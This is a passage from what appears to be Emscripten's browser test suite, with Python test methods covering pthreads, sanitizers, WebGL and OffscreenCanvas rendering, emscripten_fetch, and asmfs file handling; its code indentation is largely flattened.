# Test that stack base and max correctly bound the stack on pthreads.
@requires_threads
def test_pthread_stack_bounds(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_stack_bounds.cpp'), expected='1', args=['-s', 'USE_PTHREADS'])
# Test that real `thread_local` works.
@requires_threads
def test_pthread_tls(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_tls.cpp'), expected='1337', args=['-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
# Test that real `thread_local` works in main thread without PROXY_TO_PTHREAD.
@requires_threads
def test_pthread_tls_main(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_tls_main.cpp'), expected='1337', args=['-s', 'USE_PTHREADS'])
@requires_threads
def test_pthread_safe_stack(self):
# Note that as the test runs with PROXY_TO_PTHREAD, we set TOTAL_STACK,
# and not DEFAULT_PTHREAD_STACK_SIZE, as the pthread for main() gets the
# same stack size as the main thread normally would.
self.btest(path_from_root('tests', 'core', 'test_safe_stack.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'STACK_OVERFLOW_CHECK=2', '-s', 'TOTAL_STACK=64KB', '--pre-js', path_from_root('tests', 'pthread', 'test_safe_stack.js')])
@parameterized({
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_lsan(self, name, args=[]):
self.btest(path_from_root('tests', 'pthread', name + '.cpp'), expected='1', args=['-fsanitize=leak', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', path_from_root('tests', 'pthread', name + '.js')] + args)
@parameterized({
# Reusing the LSan test files for ASan.
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_asan(self, name, args=[]):
self.btest(path_from_root('tests', 'pthread', name + '.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', path_from_root('tests', 'pthread', name + '.js')] + args)
@requires_threads
def test_pthread_asan_use_after_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_asan_use_after_free.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', path_from_root('tests', 'pthread', 'test_pthread_asan_use_after_free.js')])
@requires_threads
def test_pthread_exit_process(self):
args = ['-s', 'USE_PTHREADS=1',
'-s', 'PROXY_TO_PTHREAD',
'-s', 'PTHREAD_POOL_SIZE=2',
'-s', 'EXIT_RUNTIME',
'-DEXIT_RUNTIME',
'-O0']
args += ['--pre-js', path_from_root('tests', 'core', 'pthread', 'test_pthread_exit_runtime.pre.js')]
self.btest(path_from_root('tests', 'core', 'pthread', 'test_pthread_exit_runtime.c'), expected='onExit status: 42', args=args)
@requires_threads
def test_pthread_no_exit_process(self):
# Same as above but without EXIT_RUNTIME. In this case we don't expect onExit to
# ever be called.
args = ['-s', 'USE_PTHREADS=1',
'-s', 'PROXY_TO_PTHREAD',
'-s', 'PTHREAD_POOL_SIZE=2',
'-O0']
args += ['--pre-js', path_from_root('tests', 'core', 'pthread', 'test_pthread_exit_runtime.pre.js')]
self.btest(path_from_root('tests', 'core', 'pthread', 'test_pthread_exit_runtime.c'), expected='43', args=args)
# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
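  # Rough sketch of the call shape being tested (hypothetical snippet, not the test source);
  # MAIN_THREAD_EM_ASM_INT runs the JS block on the main thread and returns an int:
  #
  #   int sum = MAIN_THREAD_EM_ASM_INT({ return $0 + $1; }, 20, 22);   // sum == 42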
def test_main_thread_em_asm_signatures(self):
self.btest(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=[])
@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
self.btest(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'ASSERTIONS=1'])
@requires_threads
def test_main_thread_async_em_asm(self):
self.btest(path_from_root('tests', 'core', 'test_main_thread_async_em_asm.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'ASSERTIONS=1'])
@requires_threads
def test_main_thread_em_asm_blocking(self):
create_test_file('page.html',
open(path_from_root('tests', 'browser', 'test_em_asm_blocking.html')).read())
self.compile_btest([path_from_root('tests', 'browser', 'test_em_asm_blocking.cpp'), '-O2', '-o', 'wasm.js', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
self.run_browser('page.html', '', '/report_result?8')
# test atomicrmw i64
@no_wasm_backend('uses an asm.js .ll file')
@requires_threads
def test_atomicrmw_i64(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
self.compile_btest([path_from_root('tests', 'atomicrmw_i64.ll'), '-s', 'USE_PTHREADS=1', '-s', 'IN_TEST_HARNESS=1', '-o', 'test.html', '-s', 'WASM=0'])
self.run_browser('test.html', None, '/report_result?0')
  # Test that it is possible to send a signal via calling alarm(timeout), which in turn calls the signal handler set by signal(SIGALRM, func);
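  # Rough sketch of the mechanism (hypothetical snippet, not the test source):
  #
  #   void handler(int sig) { /* runs when SIGALRM is delivered */ }
  #   ...
  #   signal(SIGALRM, handler);
  #   alarm(1);                        // request SIGALRM after ~1 second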
def test_sigalrm(self):
self.btest(path_from_root('tests', 'sigalrm.cpp'), expected='0', args=['-O3'])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests/canvas_style_proxy_shell.html'), '--pre-js', path_from_root('tests/canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(path_from_root('tests', 'canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(path_from_root('tests', 'custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests', 'custom_messages_proxy_shell.html'), '--post-js', path_from_root('tests', 'custom_messages_proxy_postjs.js')])
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker'])
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
@no_wasm_backend('mem init file')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-s', 'WASM=0']
print('plain html')
self.compile_btest([path_from_root('tests', 'in_flight_memfile_request.c'), '-o', 'test.js'] + opts)
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
@requires_sync_compilation
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['--shell-file', 'shell.html']
for opts, expect in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-s', 'WASM_ASYNC_COMPILATION=1'], 1), # force it on
(['-O1', '-s', 'WASM_ASYNC_COMPILATION=0'], 0), # force it off
]:
print(opts, expect)
self.btest('binaryen_async.c', expected=str(expect), args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest('binaryen_async.c', expected='1', args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
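  # The hook being exercised has roughly the following shape (hypothetical sketch of the documented
  # Module.instantiateWasm callback, not the actual page source):
  #
  #   Module.instantiateWasm = function(imports, successCallback) {
  #     WebAssembly.instantiateStreaming(fetch('manual_wasm_instantiate.wasm'), imports)
  #       .then(function(output) { successCallback(output.instance); });
  #     return {};  // exports are delivered asynchronously via successCallback
  #   };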
def test_manual_wasm_instantiate(self):
self.compile_btest([path_from_root('tests/manual_wasm_instantiate.cpp'), '-o', 'manual_wasm_instantiate.js', '-s', 'BINARYEN=1'])
shutil.copyfile(path_from_root('tests', 'manual_wasm_instantiate.html'), 'manual_wasm_instantiate.html')
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
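    # The hook looks roughly like this (hypothetical sketch; the real shell2.html below inlines an
    # equivalent one-liner):
    #
    #   Module.locateFile = function(path, prefix) {
    #     return path == 'test.wasm' ? 'cdn/' + path : prefix + path;
    #   };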
ensure_dir('cdn')
create_test_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '--shell-file', 'shell2.html', '-o', 'test.html'])
shutil.move('test.wasm', os.path.join('cdn', 'test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
def test_utf8_textdecoder(self):
self.btest_exit('benchmark_utf8.cpp', 0, args=['--embed-file', path_from_root('tests/utf8_corpus.txt') + '@/utf8_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF8ToString"]'])
def test_utf16_textdecoder(self):
self.btest_exit('benchmark_utf16.cpp', 0, args=['--embed-file', path_from_root('tests/utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF16ToString","stringToUTF16","lengthBytesUTF16"]'])
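  # Tests the -s TEXTDECODER=x setting: 0 is expected to use only the JS string decoder, the
  # default (1) to use TextDecoder while keeping the JS fallback around, and 2 to rely on
  # TextDecoder alone, hence the code size ordering asserted below.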
def test_TextDecoder(self):
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=0'])
just_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0')
td_with_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=2'])
td_without_fallback = os.path.getsize('test.js')
self.assertLess(td_without_fallback, just_fallback)
self.assertLess(just_fallback, td_with_fallback)
def test_small_js_flags(self):
self.btest('browser_test_hello_world.c', '0', args=['-O3', '--closure', '1', '-s', 'INCOMING_MODULE_JS_API=[]', '-s', 'ENVIRONMENT=web'])
# Check an absolute js code size, with some slack.
size = os.path.getsize('test.js')
print('size:', size)
# Note that this size includes test harness additions (for reporting the result, etc.).
self.assertLess(abs(size - 5368), 100)
# Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see https://crbug.com/961765')
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL'])
# Tests that it is possible to render WebGL content on a <canvas> on the main thread, after it has once been used to render WebGL content in a pthread first
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
    self.skipTest('This test is disabled because current OffscreenCanvas does not allow transferring it after a rendering context has been created for it.')
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL'])
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_only_in_pthread(self):
self.btest('gl_only_in_pthread.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1'])
# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-s', 'FULL_ES2=1'])
# Tests for WEBGL_multi_draw extension
  # For testing WebGL draft extensions like this, if using Chrome as the browser,
  # we might want to append --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
@requires_graphics_hardware
def test_webgl_multi_draw(self):
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DMULTI_DRAW_ARRAYS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DMULTI_DRAW_ARRAYS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DMULTI_DRAW_ELEMENTS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DMULTI_DRAW_ELEMENTS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
# Tests for base_vertex/base_instance extension
  # For testing WebGL draft extensions like this, if using Chrome as the browser,
  # we might want to append --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
  # If testing on Mac, you also need --use-cmd-decoder=passthrough to get this extension.
  # Also there is a known bug with Mac Intel baseInstance which can fail to produce the expected image result.
@requires_graphics_hardware
def test_webgl_draw_base_vertex_base_instance(self):
for multiDraw in [0, 1]:
for drawElements in [0, 1]:
self.btest('webgl_draw_base_vertex_base_instance_test.c', reference='webgl_draw_instanced_base_vertex_base_instance.png',
args=['-lGL',
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'OFFSCREEN_FRAMEBUFFER=1',
'-DMULTI_DRAW=' + str(multiDraw),
'-DDRAW_ELEMENTS=' + str(drawElements),
'-DEXPLICIT_SWAP=1',
'-DWEBGL_CONTEXT_VERSION=2'])
# Tests that -s OFFSCREEN_FRAMEBUFFER=1 rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
# Tests all the different possible versions of libgl
for threads in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD']]:
      for version in [[], ['-s', 'FULL_ES3']]:
args = ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1'] + threads + version
print('with args: %s' % str(args))
self.btest('webgl_draw_triangle.c', '0', args=args)
# Tests that VAOs can be used even if WebGL enableExtensionsByDefault is set to 0.
@requires_graphics_hardware
def test_webgl_vao_without_automatic_extensions(self):
self.btest('test_webgl_no_auto_init_extensions.c', '0', args=['-lGL', '-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=0'])
# Tests that offscreen framebuffer state restoration works
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer_state_restoration(self):
for args in [
# full state restoration path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION=1', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH=1'],
# VAO path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION=1'],
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=0'],
# VAO path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-DTEST_REQUIRE_VAO=1'],
# full state restoration path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH=1'],
# blitFramebuffer path on WebGL 2.0 (falls back to VAO on Firefox < 67)
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=0'],
]:
cmd = args + ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1']
self.btest('webgl_offscreen_framebuffer_swap_with_bad_state.c', '0', args=cmd)
# Tests that -s WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1 rendering works.
@requires_graphics_hardware
def test_webgl_workaround_webgl_uniform_upload_bug(self):
self.btest('webgl_draw_triangle_with_uniform_color.c', '0', args=['-lGL', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1'])
# Tests that using an array of structs in GL uniforms works.
@requires_graphics_hardware
def test_webgl_array_of_structs_uniform(self):
self.btest('webgl_array_of_structs_uniform.c', args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2'], reference='webgl_array_of_structs_uniform.png')
# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
  # -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it by using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
  # -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via the automatic transfer of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
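  # Rough sketch of how a canvas is handed to a thread in the explicit case (hypothetical snippet,
  # not the test source; assumes the emscripten_pthread_attr_settransferredcanvases() helper from
  # emscripten/threading.h):
  #
  #   pthread_attr_t attr;
  #   pthread_attr_init(&attr);
  #   emscripten_pthread_attr_settransferredcanvases(&attr, "#canvas");
  #   pthread_create(&t, &attr, thread_main, 0);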
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_proxied_pthread(self):
for asyncify in [0, 1]:
cmd = ['-s', 'USE_PTHREADS=1', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'GL_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1']
if asyncify:
# given the synchronous render loop here, asyncify is needed to see intermediate frames and
# the gradual color change
cmd += ['-s', 'ASYNCIFY', '-DASYNCIFY']
print(str(cmd))
self.btest('gl_in_proxy_pthread.cpp', expected='1', args=cmd)
@requires_threads
@requires_graphics_hardware
@requires_offscreen_canvas
def test_webgl_resize_offscreencanvas_from_main_thread(self):
for args1 in [[], ['-s', 'PROXY_TO_PTHREAD=1']]:
for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
for args3 in [[], ['-s', 'OFFSCREENCANVAS_SUPPORT=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1']]:
cmd = args1 + args2 + args3 + ['-s', 'USE_PTHREADS=1', '-lGL', '-s', 'GL_DEBUG=1']
print(str(cmd))
self.btest('resize_offscreencanvas_from_main_thread.cpp', expected='1', args=cmd)
@requires_graphics_hardware
def test_webgl_simple_enable_extensions(self):
for webgl_version in [1, 2]:
for simple_enable_extensions in [0, 1]:
cmd = ['-DWEBGL_CONTEXT_VERSION=' + str(webgl_version),
'-DWEBGL_SIMPLE_ENABLE_EXTENSION=' + str(simple_enable_extensions),
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=' + str(simple_enable_extensions),
'-s', 'GL_SUPPORT_SIMPLE_ENABLE_EXTENSIONS=' + str(simple_enable_extensions)]
self.btest('webgl2_simple_enable_extensions.c', expected='0', args=cmd)
  # Tests the feature that the shell html page can preallocate the typed array and place it in Module.buffer before loading the main script.
  # In this build mode, the -s INITIAL_MEMORY=xxx option will be ignored.
  # Preallocating the buffer in this way is asm.js only (wasm needs a Memory).
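  # The shell page is expected to do roughly the following before the compiled script runs
  # (hypothetical sketch; the buffer size is arbitrary for illustration):
  #
  #   <script> var Module = { buffer: new ArrayBuffer(16 * 1024 * 1024) }; </script>
  #   <script src="test.js"></script>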
@no_wasm_backend('asm.js feature')
def test_preallocated_heap(self):
self.btest('test_preallocated_heap.cpp', expected='1', args=['-s', 'WASM=0', '-s', 'INITIAL_MEMORY=16MB', '-s', 'ABORTING_MALLOC=0', '--shell-file', path_from_root('tests', 'test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
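  # Rough sketch of the C-side usage being exercised (hypothetical snippet, not the test source;
  # on_success/on_error are placeholder callback names):
  #
  #   emscripten_fetch_attr_t attr;
  #   emscripten_fetch_attr_init(&attr);
  #   strcpy(attr.requestMethod, "GET");
  #   attr.attributes = EMSCRIPTEN_FETCH_LOAD_TO_MEMORY;   // keep the bytes in memory only
  #   attr.onsuccess = on_success;
  #   attr.onerror = on_error;
  #   emscripten_fetch(&attr, "gears.png");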
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest('fetch/to_memory.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-DFILE_DOES_NOT_EXIST'],
also_asmjs=True)
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
for arg in [[], ['-s', 'FETCH_SUPPORT_INDEXEDDB=0']]:
self.btest('fetch/to_memory.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'] + arg,
also_asmjs=True)
def test_fetch_to_indexdb(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/to_indexeddb.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'],
also_asmjs=True)
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
def test_fetch_cached_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/cached_xhr.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'],
also_asmjs=True)
# Tests that response headers get set on emscripten_fetch_t values.
@requires_threads
def test_fetch_response_headers(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/response_headers.cpp', expected='1', args=['-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'], also_asmjs=True)
  # Test emscripten_fetch() usage to stream an XHR into memory without storing the full file in memory
def test_fetch_stream_file(self):
self.skipTest('moz-chunked-arraybuffer was firefox-only and has been removed')
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
with open('largefile.txt', 'w') as f:
for i in range(1024):
f.write(s)
self.btest('fetch/stream_file.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'INITIAL_MEMORY=536870912'],
also_asmjs=True)
# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -s PROXY_TO_PTHREAD=1 option.
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_sync_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp', expected='1', args=['-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests emscripten_fetch() usage when user passes none of the main 3 flags (append/replace/no_download).
  # In that case, append is implicitly understood.
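  # (The three flags referred to are the EMSCRIPTEN_FETCH_APPEND, EMSCRIPTEN_FETCH_REPLACE and
  # EMSCRIPTEN_FETCH_NO_DOWNLOAD bits that can be set on emscripten_fetch_attr_t::attributes.)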
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_implicit_append(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests synchronous emscripten_fetch() usage from wasm pthread in fastcomp.
@requires_threads
def test_fetch_sync_xhr_in_wasm(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@requires_threads
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '--proxy-to-worker'],
also_asmjs=True)
# Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread
@no_wasm_backend("emscripten_fetch_wait uses an asm.js based web worker")
@requires_threads
def test_fetch_sync_fetch_in_main_thread(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_fetch_in_main_thread.cpp', expected='0', args=['-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_store(self):
self.btest('fetch/idb_store.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_delete(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/idb_delete.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_asmfs
@requires_threads
def test_asmfs_hello_file(self):
# Test basic file loading and the valid character set for files.
ensure_dir('dirrey')
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'dirrey', 'hello file !#$%&\'()+,-.;=@[]^_`{}~ %%.txt'))
self.btest('asmfs/hello_file.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_asmfs
@requires_threads
def test_asmfs_read_file_twice(self):
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), 'hello_file.txt')
self.btest('asmfs/read_file_twice.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_asmfs
@requires_threads
def test_asmfs_fopen_write(self):
self.btest('asmfs/fopen_write.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_asmfs
@requires_threads
def test_asmfs_mkdir_create_unlink_rmdir(self):
self.btest('cstdio/test_remove.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir(self):
self.btest('dirent/test_readdir.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir_empty(self):
self.btest('dirent/test_readdir_empty.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_asmfs
@requires_threads
